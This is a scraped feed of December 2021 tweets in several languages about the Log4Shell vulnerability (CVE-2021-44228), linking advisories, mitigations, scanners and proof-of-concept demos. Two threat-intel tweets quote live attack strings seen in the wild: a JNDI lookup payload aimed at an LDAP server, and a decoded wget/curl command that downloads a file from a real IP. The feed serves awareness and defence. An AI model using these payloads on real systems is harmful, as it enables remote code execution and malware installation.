2021-12-28 01:12:15CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/8ajeEHS97G https://twitter.com/i/web/status/1475632852834263042JTelly
2021-12-28 00:01:56[ばばさん通信ダイジェスト] 賛否関わらず話題になった/なりそうなものを共有しています。 Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた https://t.co/NMtG6CRCh1 https://ift.tt/3oNypF1netmarkjp
2021-12-28 00:01:36【セキュリティ情報】 「Apache Log4j における任意のコードが実行可能な脆弱性について(CVE-2021-44228, CVE-2021-45046) 」を掲載しました。 https://t.co/nwCdaXAmwg https://www.apresia.jp/technical/security/APRESIA_Systems
2021-12-27 23:52:36.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/bEHH9zX0GB https://twitter.com/i/web/status/1475613515092275205Woronka
2021-12-27 22:50:34An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/A0qGsySyFq https://twitter.com/i/web/status/1475599078331502596ProductCERT
2021-12-27 21:31:00先週のブログは、12/11に #JPCERT/CC が注意喚起した、 #Apache #Log4j の任意コード実行の #脆弱性 (CVE-2021-44228) について書きました。 オープンソースかどうかにかかわらず、外部のラ… https://t.co/EMfOpqs3bd https://twitter.com/i/web/status/1475579239277625344crosslaboratory
2021-12-27 20:52:32Armas para Hacking No. 28 | Log4Shell (CVE-2021-44228) https://t.co/XUb4iqBqhk https://r3dbird.blogspot.com/2021/12/armas-para-hacking-no-28-log4shell-cve.htmldrok3r
2021-12-27 19:53:36#Emotet C2 server seems to be released to #Log4Shell (#CVE-2021-44228) 🚨 IP: 46.55.222[.]11 - Online 🔥… https://t.co/5nuAZXp7dR https://twitter.com/i/web/status/1475552360122433536Max_Mal_
2021-12-27 19:12:26SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention &amp; Mitigation #apache #log4j #infosec… https://t.co/9SFV5rcZSQ https://twitter.com/i/web/status/1475542008722866177MigoKed
2021-12-27 18:51:25The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/ednhtVu5Ki https://twitter.com/i/web/status/1475538014847881220RTocaxelli
2021-12-27 17:41:41The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/fj6F0RyDCi https://twitter.com/i/web/status/1475520659912638465lucaslima_dsl
2021-12-27 17:10:09Arctic Wolf's #Log4Shell Deep Scan Tool can enable detection of both CVE-2021-45046 and CVE-2021-44228 within nest… https://t.co/Xed5i5hWNm https://twitter.com/i/web/status/1475514012683149314AWNetworks
2021-12-27 16:40:19Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/22tJB1mp43 https://dy.si/uunrk6pradeepadapa
2021-12-27 16:40:10The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/y9QksFjJ42 https://twitter.com/i/web/status/1475505772385742859KellyStefaniGo1
2021-12-27 15:20:14CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-27 14:41:25注意喚起: Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 (更新) https://t.co/aJnmICUFJ8 http://dlvr.it/SG5Zp7misakiayana777
2021-12-27 14:40:44@openitex @yuccaldo The scenario for the original log4j vulnerbaility (CVE-2021-44228) is available at… https://t.co/KLUtYr4ZMC https://twitter.com/i/web/status/1475476117494640640Crowd_Security
2021-12-27 14:12:37Top 3 trending CVEs on Twitter Past 24 hrs: : (audience size) : : Past 7 days: CVE-2021-44228: 7.9M CVE-2021-4… https://t.co/Q3YmajuVAb https://twitter.com/i/web/status/1475466508159619074CVEtrends
2021-12-27 13:10:40Mitigating the log4j Vulnerability (CVE-2021-44228) with NGINX https://t.co/5K4ipBNknc https://wiredgorilla.com/mitigating-the-log4j-vulnerability-cve-2021-44228-with-nginx/TheWiredGorilla
2021-12-27 13:00:32I just published Log4Shell Simplified - All you need to know about CVE-2021-44228 https://t.co/d76fn1eE6q… https://t.co/8LiUhmlH1o https://busk3r.medium.com/log4shell-simplified-all-you-need-to-know-about-cve-2021-44228-3c70d59c307a https://twitter.com/i/web/status/1475450110980997122busk3r
2021-12-27 12:40:04is there blog/list of "names" against "CVE IDs" like CVE-2021-44228 is for #Log4Shell and , CVE-2014-0160 is for… https://t.co/96aulzOWTv https://twitter.com/i/web/status/1475445353956536324sashank_dara
2021-12-27 11:40:16CVE-2021-44228uma_crypto
2021-12-27 11:18:23Mapa en tiempo real sobre los ataques de la vulnerabilidad Log4Shell (CVE-2021-44228) realizado por la empresa Crow… https://t.co/DBlxqBGPNC https://twitter.com/i/web/status/1475398551513407490ServiPC4
2021-12-27 11:10:14#ALLARME #vulnerabilità: CVE-2021-44228, "#Apache Zero-Day Log4j" per gli amici! https://t.co/bs0MjZwaBL https://www.difesaonline.it/evidenza/cyber/allarme-vulnerabilit%C3%A0-cve-2021-44228-apache-zero-day-log4j-gli-amicidifesa_online
2021-12-27 10:10:21During the meetup we used an example of an l4j (CVE-2021-44228) exploit attempt. I just showed how, w/ proper rules… https://t.co/a5TVLQQQE7 https://twitter.com/i/web/status/1475406530518343681jufajardini
2021-12-27 09:10:59@ithilienorthend What has English batting and CVE-2021-44228 have in common? They both ruin my weekends and holidays.missingututuo
2021-12-27 09:10:42Demo: Mitigating #Log4Shell (CVE-2021-44228) with #NSX #VMware #VMware_me #everythingVMware #vExpert https://t.co/vEuudjHqnB https://dy.si/TcwQk3ezzeldinhussein
2021-12-27 09:01:26Avi WAF and CVE-2021-44228 Apache Log4j 2 https://t.co/DgTbdgdrc3 https://dy.si/VM8n5P2JPerformer
2021-12-27 08:40:16Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/Gp9qhHbhBH https://www.mohammadspeech.thats.im/2021/12/27/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/AliPk7332
2021-12-27 07:40:16Experts at CSW have come up with a detection script to scan for Apache Log4j Vulnerabilities CVE-2021-44228, CVE-20… https://t.co/UI1bCibyj3 https://twitter.com/i/web/status/1475368396560781312CswWorks
2021-12-27 07:40:12Log4PowerShell A Proof-Of-Concept for the CVE-2021-44228 vulnerability written in #PowerShell.… https://t.co/cQ3CMLGzhA https://twitter.com/i/web/status/1475369947111075841hack_git
2021-12-27 06:51:20从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞 https://t.co/7wYATpzZYH https://t.co/o9zl1xd6Gk https://ift.tt/3psXdlL https://ift.tt/3FwkeKubuaqbot
2021-12-27 06:20:49サポート技術情報を再更新しました。 &lt;Apache Log4j の脆弱性 (CVE-2021-44228) における弊社製品への影響について&gt; https://t.co/96T4qPplRj https://t.co/JycbX47zuN https://support.arcserve.com/s/article/2021121301?language=jaArcserve_jp
2021-12-27 06:10:17Announcing Calcite release 1.29! Upgrades log4j to 2.17 to fix CVE-2021-44228 and CVE-2021-45105; among other featu… https://t.co/HTKumcPWae https://twitter.com/i/web/status/1475347722148319233ApacheCalcite
2021-12-27 05:40:13Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/fxtvskJD8v https://twitter.com/i/web/status/1475338912394473480JavierArgomniz
2021-12-27 05:10:41Apache Log4j の脆弱性と弊社ソフトウェアへの影響および対策について(CVE-2021-44228) https://t.co/8sNacsMGBC https://www.moleculardevices.co.jp/cate_news/19212Moldev_Japan
2021-12-27 05:10:19从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞 https://t.co/7wYATpzZYH https://t.co/5Vt0YGVqfW https://ift.tt/3psXdlL https://ift.tt/3mw9QuAbuaqbot
2021-12-27 04:11:29HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/euPtY2ufvA https://t.co/Km4C9rfb5G https://bit.ly/3FwG1Sasandeepkomina1
2021-12-27 03:20:17🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/hyqovsa8RW https://twitter.com/i/web/status/1475305322080350218threatintelctr
2021-12-27 02:00:53Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/OSRgZFoiZ0 https://twitter.com/i/web/status/1475285329452089345F5Labs
2021-12-27 01:10:19The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/Ge7MNrNQpC https://twitter.com/i/web/status/1475272558874439681aacevesj
2021-12-27 00:11:13Observation of Attacks Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228) - JPCERT/CC Eyes | JPCERT Coordin… https://t.co/opBssLlZ2Z https://twitter.com/i/web/status/1475256894700859399Secnewsbytes
2021-12-26 22:51:32@GreyNoiseIO is tracking a significant increase in IPs looking for the Apache Log4j vulnerability (CVE-2021-44228),… https://t.co/CUAOIR0tQD https://twitter.com/i/web/status/14752363596274933812018CCDFI
2021-12-26 21:20:06Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/Tgyx1TxjHS https://www.blogpost.cu.ma/threat-intelligence-and-protections-update-log4shell-cve-2021-44228/AliPk7332
2021-12-26 21:10:09Log4PowerShell - A CVE-2021-44228 PowerShell Demo I Wrote (/r/cybersecurity) https://t.co/b7UTza1nw7 https://www.reddit.com/r/cybersecurity/comments/rp4ijv/log4powershell_a_cve202144228_powershell_demo_i/Bobe_bot
2021-12-26 20:31:58記事を投稿しました! 【POC検証】Apache log4j 脆弱性(Log4Shell:CVE-2021-44228) [Java] on #Qiita https://t.co/hMscw8FTqp https://qiita.com/tutttuwi/items/be07a44ab1537f9fc443?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharetutttwien
2021-12-26 20:13:03記事を投稿しました! 【POC検証】Apache log4j 脆弱性(Log4Shell:CVE-2021-44228) [Java] on #Qiita https://t.co/hMscw8FTqp https://qiita.com/tutttuwi/items/be07a44ab1537f9fc443?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharetutttwien
2021-12-26 19:53:27記事を投稿しました! 【POC検証】Apache log4j 脆弱性(Log4Shell:CVE-2021-44228) [Java] on #Qiita https://t.co/hMscw8FTqp https://qiita.com/tutttuwi/items/be07a44ab1537f9fc443?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharetutttwien
2021-12-26 19:34:11記事を投稿しました! 【POC検証】Apache log4j 脆弱性(Log4Shell:CVE-2021-44228) [Java] on #Qiita https://t.co/hMscw8FTqp https://qiita.com/tutttuwi/items/be07a44ab1537f9fc443?utm_campaign=post_article&utm_medium=twitter&utm_source=twitter_sharetutttwien
2021-12-26 18:20:14DAY 4 Out 100 Days Cyberlearning log4jRCE(CVE-2021-44228) -Yesterday jvm Vulnerability that shook the entire cyber… https://t.co/46R0VPP4Er https://twitter.com/i/web/status/1475168214837436421hardikkp95
2021-12-26 17:29:21Who helped coordinate the global response on CVE-2021-44228? Two Twitter hashtags: #log4j and #log4shell. In this b… https://t.co/bXgauGUrLu https://twitter.com/i/web/status/1475151097736085505cloudsa
2021-12-26 17:20:31VULNERABILITY NOTES: LOG4SHELL Everything you should know about the Log4Shell vulnerability (CVE-2021-44228) https://t.co/nIFGTQeHHn https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/pentest_swissky
2021-12-26 16:40:22The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/gbQNpkIbq4 https://twitter.com/i/web/status/1475144249511456771velez1066
2021-12-26 16:40:12The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/BYyVbkp2EF https://twitter.com/i/web/status/1475144359066705921velez1066
2021-12-26 16:00:18Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/rDAxO7BS5G https://dy.si/FpCz3T2virtualquebec
2021-12-26 15:19:43SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention &amp; Mitigation #apache #log4j #infosec… https://t.co/xEFlVorE0n https://twitter.com/i/web/status/1475119223156445185diwakardayal
2021-12-26 15:19:18CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability #log4j2 #java #cybersecurity #exploit #infosec… https://t.co/UlEVtcjuE9 https://twitter.com/i/web/status/1475119223261257728diwakardayal
2021-12-26 15:18:11CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-26 14:50:37Esri's statement regarding ArcGIS and CVE-2021-44228 Apache Log4j 2. Read for the latest regarding this concern.… https://t.co/NodpFHrgtm https://twitter.com/i/web/status/1475114342999810050TimPoeGISP
2021-12-26 14:00:13interesting blog on how to Mitigate the log4j Vulnerability (CVE-2021-44228) with NGINX. #log4j #log4jshell https://t.co/lNKhUBxWLP https://lnkd.in/efZkj2T9doukkalli
2021-12-26 13:00:24GitHub – 0xDexter0us/Log4J-Scanner: Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post au… https://t.co/lxdwPnMSiH https://twitter.com/i/web/status/1475084087031480320d34dr4bbit
2021-12-26 07:52:32The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/8zdUxXgqSf https://t.co/LwdHudGBwF https://bit.ly/3FsFTmMBilekSimon
2021-12-26 07:31:18What is the role of TZ-CERT concerning Threat Advisory: LOG4J UNAUTHENTICATED RCE CVE-2021-44228 VULNERABILITY https://t.co/uwZOTSd50P https://twitter.com/iamcleopatricia/status/1474774393276583942eugenefied
2021-12-26 06:30:53Mohist-1.7.10のlog4j脆弱性(CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)対策版出ました https://t.co/8LWOMLcm19 https://ci.codemc.io/job/MohistMC/job/Mohist-1.7.10/45/Kaiz_JP
2021-12-26 04:50:05Apache Log4j2のセキュリティ脆弱性(CVE-2021-44228およびCVE-2021-45046)に関する情報が2021年12月中旬に報道されましたが、当該脆弱性はClaris 製品に影響はない旨がClaris ナレ… https://t.co/uy5NNieHOj https://twitter.com/i/web/status/1474963969664512001matsuo_atsushi
2021-12-26 01:16:44#Log4j #Log4Shell #Java Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228 https://t.co/HfS6BNXwLW https://t.co/fMrZrDrERP https://www.youtube.com/watch?v=w2F67LbEtnktivrfoa
2021-12-26 00:30:14対応策の参考 / “Log4j2 Vulnerability (CVE-2021-44228) Research and Assessment - The Databricks Blog” https://t.co/5NyTJpXceH https://htn.to/4rMA77puXfwaiha8
2021-12-25 21:21:195 Things We’ve Learned About CVE-2021-44228 #cybersecurity #feedly https://t.co/JmZGpk6Jsd https://t.co/PZCkFKWgtv https://bit.ly/3q7r3LIwinklhawk
2021-12-25 19:51:16vCenter Server で CVE-2021-44228 &amp; CVE-2021-45046 への対処が未実施の方、今なら vc_log4j_mitigator.py の実行だけで済みますので早めの対処を・・・ https://t.co/1zt8R4esGP https://jangari-ntk.github.io/post/2021-12-26/Jangari_nTK
2021-12-25 19:20:58GitHub - fireeye/CVE-2021-44228: OpenIOC rules to facilitate hunting for indicators of compromise https://t.co/1qmFDqOXPG https://github.com/fireeye/CVE-2021-44228akaclandestine
2021-12-25 19:10:17log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/s3ATpYnooc https://twitter.com/i/web/status/1474818133651337226ethical_enso
2021-12-25 17:53:17Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide https://t.co/MPtZQZzbVg https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/SbrCh2
2021-12-25 17:43:57.@FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, an… https://t.co/d3w87eDspn https://twitter.com/i/web/status/1474796076335079427A_Valencia_Gil
2021-12-25 16:15:32Apache Log4j vulnerability (CVE-2021-44228) https://t.co/f3p5DAIBaR http://dlvr.it/SG1MB9arcanoaellc
2021-12-25 15:40:23HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/TIrws8OiAY https://t.co/JxboTfTQaw https://bit.ly/3HrOSVZWMuntzen
2021-12-25 15:30:13Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security | Elastic Blog https://t.co/5fppGqgUCR https://bit.ly/3FqpAXwintrasecure
2021-12-25 12:41:15Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた https://t.co/8fZzR7USB5 https://piyolog.hatenadiary.jp/entry/2021/12/13/045541kirimemo
2021-12-25 10:01:10Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/1HpTYTvMPG #Pentesting… https://t.co/GbgqMHE6JV https://sysdig.com/blog/exploit-detect-mitigate-log4j-cve/ https://twitter.com/i/web/status/1474678915541213185Anastasis_King
2021-12-25 08:50:14👂CVE-2021-44228Gardenia_pwmb
2021-12-25 07:11:40CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-25 07:01:00Question Sécurité, une vulnérabilité coté Java a fait surface Jeudi dernier. Son nom: Log4Shell (CVE-2021-44228); E… https://t.co/gUlPi82TrY https://twitter.com/i/web/status/1474633796767162368OpenSDF30
2021-12-25 06:20:49&lt; 最新のJavaニュース &gt; 「Apache Log4j」での遠隔からの任意コード実行の深刻な脆弱性(CVE-2021-44228)について 概要:&lt;b&gt;Java&lt;/b&gt;ベースのオープンソースのロギングライブラリのApach… https://t.co/qsS6lgvfqj https://twitter.com/i/web/status/1474624554513412099techstock_int
2021-12-25 05:50:06https://t.co/7RjLxs4wkg - Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 22) https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/tranceattic
2021-12-25 05:41:08https://t.co/7RjLxs4wkg - Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated Dec. 22) https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/tranceattic
2021-12-25 03:14:26SBOMs, Syft, and Log4j CVE-2021-44228 @anchore @SPDXTeam https://t.co/7ncsfjKwrN #sbom #containers #kubernetes… https://t.co/AMlYncA8Or https://thnkbig.com/blog/sboms-syft-log4j-cve-2021-44228 https://twitter.com/i/web/status/1474577523996508164ThnkBiG
2021-12-25 03:00:23SBOMs Syft Log4j CVE-2021-44228 https://t.co/7ncsfjKwrN https://thnkbig.com/blog/sboms-syft-log4j-cve-2021-44228ThnkBiG
2021-12-25 01:52:27Exploiting and Mitigating CVE-2021-44228: Log4j Remote Code Execution (RCE) https://t.co/6PDs51jw15 https://youtu.be/5DbhKLnZswYjuanitourquiza
2021-12-25 01:51:45Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/rMgZV5s2on a través de @YouTube https://youtu.be/w2F67LbEtnkalbertocabalero
2021-12-25 01:20:25🚨🚨🚨CVE-2021-44228Har_sia
2021-12-25 00:51:32“Zoom Security Bulletin for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105” https://t.co/GgicIjCgoD https://htn.to/2eEhbjaYQFmodokey
2021-12-24 23:40:40CVE-2021-44228 This repository contains OpenIOC rules to facilitate hunting for indicators of compromise related to… https://t.co/g2Z4BWPFU4 https://twitter.com/i/web/status/1474524354117574658hack_git
2021-12-24 23:21:51Example CVE-2021-44228 payload (decoded): wget http://18.222.122.221/reader; curl -O http://18.222.122.221/reader;… https://t.co/aRiLfu4v0c https://twitter.com/i/web/status/1474518621992931330bad_packets
2021-12-24 23:21:40The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/VWrCzRXzlt https://t.co/35KiotsyZc https://bit.ly/3yY8hupdwood87
2021-12-24 21:10:33JavaのLog4jライブラリに存在していたリモートコード実行を可能にする脆弱性「CVE-2021-44228(Log4Shell)」を突いてAWSアカウントを乗っ取る方法をセキュリティ企業のGigasheetが公開しました。… https://t.co/t27tzQsk6T https://twitter.com/i/web/status/1474486369703636997foxbook
2021-12-24 20:51:10@JayzTwoCents not bad, a new video only 15 days after Alibaba reported it to Apache as CVE-2021-44228 and named it… https://t.co/18mM30iOU2 https://twitter.com/i/web/status/1474481166103322632WinstonWoof
2021-12-24 19:12:38Example CVE-2021-44228 payload: User agent: ${jndi:ldap://121.140.99.236:1389/Exploit} (🇰🇷) Source IP: 5.157.38.5… https://t.co/S4UpHAlWbc https://twitter.com/i/web/status/1474454994929680384bad_packets
2021-12-24 18:30:59CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-24 17:30:19GitHub – fireeye/CVE-2021-44228: OpenIOC rules to facilitate hunting for indicators of compromise https://t.co/BNGCSFHyCu https://morethandiscovery.net/github-fireeye-cve-2021-44228-openioc-rules-to-facilitate-hunting-for-indicators-of-compromise/MetadataMatters
2021-12-24 17:20:05@securitynl Vrijdag 9 dec was de dag dat de Log4Shell kwetsbaarheid, die ook wel CVE-2021-44228 wordt genoemd, open… https://t.co/5QnbkzvdWu https://twitter.com/i/web/status/1474428871562960898OOosterink
2021-12-24 17:11:38Updates on the Apache Log4j CVE-2021-44228 vulnerability #SASusers https://t.co/mgF8UawmJV https://blogs.sas.com/content/sgf/2021/12/24/cve-2021-44228-log4j/SAS_Cares
2021-12-24 17:02:34Log4j Lookups in Depth // Log4Shell CVE-2021-44228 - Part 2 https://t.co/iy6xOGA56k https://youtu.be/iI9Dz3zN4d8GiovanniStultus
2021-12-24 16:42:58Log4j Lookups In Depth // Log4Shell CVE-2021-44228 - Part 2 #Hacking #PenTest https://t.co/wheCa03V4Z https://t.co/Y9wmTRm7XU https://ift.tt/3JgpDrfhack_videos
2021-12-24 16:42:38Demo: Detecting &amp; Preventing Log4Shell (CVE-2021-44228) with NSX-T 3.2 Distributed IDS/IPS https://t.co/TcA0rDADmv https://dy.si/qdosBo2mastr79
2021-12-24 15:50:40Extra! Extra! Read all about it! Cloudera Response to CVE-2021-44228 by @cloudera https://t.co/ZATLHrpyU4 https://t.co/gIZ1tkjgGI https://blog.cloudera.com/cloudera-response-to-cve-2021-44228/?utm_source=dlvr.it&utm_medium=twitterdataleaderposts
2021-12-24 15:40:14docker desktop がApache Log4j 2 CVE-2021-44228のtipsだしてくるじゃんtsukumm
2021-12-24 15:00:09The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/v6ofLdYxzZ https://t.co/px6MkZONi0 https://bit.ly/3HddykWdwood87
2021-12-24 14:32:17CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/VZBfoFPuex https://twitter.com/i/web/status/14743823617520025661Ivango1
2021-12-24 14:00:20Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.8M (audience size) CVE-2021-30853: 1M CVE-2021-44790… https://t.co/edxQbmUlcs https://twitter.com/i/web/status/1474379342004240408CVEtrends
2021-12-24 13:50:54Hackers vs. Developers // CVE-2021-44228 Log4Shell https://t.co/dZBceQu1q3 via @YouTube https://youtu.be/w2F67LbEtnkmiyu4674
2021-12-24 13:43:56CISA Log4j 취약점(CVE-2021-44228, CVE-2021-45046) 점검 스캐너(Scanner) 다운로드 : https://t.co/4673XU7cuD http://naver.me/F5LCnsVevirusmyths
2021-12-24 13:10:41Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/Wg2CUxvjE1 https://dy.si/T6GQmcristrmercado
2021-12-24 12:40:11Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/cy5wxpbQgF https://dy.si/95VkeCsatyashr
2021-12-24 12:20:19Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell https://t.co/obk7ZvdjNx #infosec… https://t.co/dnW6bWyuHg https://www.reddit.com/r/netsec/comments/rnflzk/log4powershell_a_cve202144228_proof_of_concept/ https://twitter.com/i/web/status/1474353152317005825beingsheerazali
2021-12-24 12:00:15#netcool #omnibus Watson AIOps and Netcool Operations Insights Log4j CVE-2021-44228 Remediation https://t.co/dGJctbl1EA https://www.ibm.com/support/pages/node/6525550suncandsybase
2021-12-24 10:51:54List of IP addresses exploiting the #log4j #CVE-2021-44228 vulnerability, as reported by our network. (Updated seve… https://t.co/3AO0XJ04mp https://twitter.com/i/web/status/1474329014106046477MonstrBck
2021-12-24 10:51:20В этой статье поговорим об уязвимости в библиотеке Apache log4j. Уязвимость CVE-2021-44228 приводит к выполнению пр… https://t.co/BmQTBvZeUB https://twitter.com/i/web/status/1474330180055408640CisoClubru
2021-12-24 10:42:56Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/0AdEkJRUdI https://dy.si/sCwrRMarcHuppert
2021-12-24 10:42:29Merry Christmas🎄 🚩New vulnerability: Apache James Log4j2 command execution vulnerability(CVE-2021-44228) (RedTeam v… https://t.co/q7qjZT8cTe https://twitter.com/i/web/status/1474327321515794436GobySec
2021-12-24 10:41:59Merry Christmas🎄 🚩New vulnerability: apereo CAS log4shell RCE vulnerability (CVE-2021-44228) (RedTeam version)#Goby… https://t.co/iVfl7Smy39 https://twitter.com/i/web/status/1474327638223515648GobySec
2021-12-24 10:41:17Merry Christmas🎄 🚩New vulnerability: Control-M log4j2 Remote command execution vulnerability (CVE-2021-44228) (RedT… https://t.co/qQUMrISayz https://twitter.com/i/web/status/1474328284297326604GobySec
2021-12-24 10:40:17Merry Christmas🎄 🚩New vulnerability: UniFi Network log4j2 RCE (CVE-2021-44228) (RedTeam version)#Goby #log4j… https://t.co/j1sK5GJJHZ https://twitter.com/i/web/status/1474328966492454915GobySec
2021-12-24 10:00:37Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/zIao0do1fV https://dy.si/bUwYFFreekOA
2021-12-24 10:00:26Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/taRNmPrsHx https://dy.si/dhkCdFreekOA
2021-12-24 09:50:38Live overview of the #Log4J global threat tracker. For exploit CVE-2021-44228 https://t.co/Douf9eBTnN https://crowdsec.net/log4j-tracker/mis_config
2021-12-24 09:40:30Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell https://t.co/w1Dz8ghdXV https://www.reddit.com/r/netsec/comments/rnflzk/log4powershell_a_cve202144228_proof_of_concept/Dinosn
2021-12-24 09:30:34「Apache Log4j」での遠隔からの任意コード実行の深刻な脆弱性(CVE-2021-44228)について https://t.co/f74iKlspwx https://t.co/RkG8oa1LFb http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-24%2018%3A20 https://pre-miya.com/special/dreamNews/detailep.php?id=0000250906sec_trend
2021-12-24 08:43:37@samehsamir56 It looks like it covers CVE-2021-44228 only. You can find out further information here: https://t.co/ZhpqhPQDMU :) https://blog.silentsignal.eu/2021/12/12/our-new-tool-for-enumerating-hidden-log4shell-affected-hosts/PortSwigger
2021-12-24 08:39:51[https://t.co/FVk2bWWbek] Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell https://t.co/Aaqhh7W9Nd https://www.reddit.com/r/netsec https://www.reddit.com/r/netsec/comments/rnflzk/log4powershell_a_cve202144228_proof_of_concept/?utm_source=dlvr.it&utm_medium=twitterzauw_
2021-12-24 08:39:06My First #log4jrce on @Hacker0x01 😍😍😍 Log4j CVE-2021-44228 #bugbountytips #BugBounty #hackers #Log4Shell https://t.co/X25Z7afUN2thagomizer_rb
2021-12-24 08:01:12日本レジリエンス株式会社、「Apache Log4j」での遠隔からの任意コード実行の深刻な脆弱性(CVE-2021-44228)について、クラウド型WAF「BLUE Sphere」が対策完了を発表 https://t.co/D8jiyIWxOe https://newsrelea.se/GKDZZnNewsrelease_IT
2021-12-24 07:50:59New post: "Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell" https://t.co/GiLSqcvXIB https://ift.tt/3ej9rXUMyinfosecfeed
2021-12-24 07:10:58Log4j2 Exploit Demo - SpringBoot (CVE-2021-44228) https://t.co/gVp4BsB0gd via @YouTube #log4j2 #springboot #cybersecurity https://youtu.be/ZOtCmzYH8_4reju_pillai
2021-12-24 07:00:39Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell via /r/netsec… https://t.co/b18WcFOXRE https://twitter.com/i/web/status/1474273559237255176CybrXx0
2021-12-24 06:50:54Log4PowerShell - A CVE-2021-44228 Proof of Concept / Demo I wrote in PowerShell https://t.co/u3f3lxoMpj #infosec… https://t.co/Yp8AzU1bwS https://github.com/aalex954/Log4PowerShell https://twitter.com/i/web/status/1474269000234201090beingsheerazali
2021-12-24 06:41:22Log4PowerShell (CVE-2021-44228) Proof of Concept &gt; GitHub - aalex954/Log4PowerShell: A Log4j PoC written in PowerSh… https://t.co/zz6ZcAQwPf https://twitter.com/i/web/status/1474266553600610304ohhara_shiojiri
2021-12-24 06:40:42Apache Log4j2の脆弱性に対する防御(CVE-2021-44228) https://t.co/QcMcO5wjhh https://www.f5.com/ja_jp/company/blog/apache-log4j-vulnerability#.YcVqMREElEU.twitteroha000
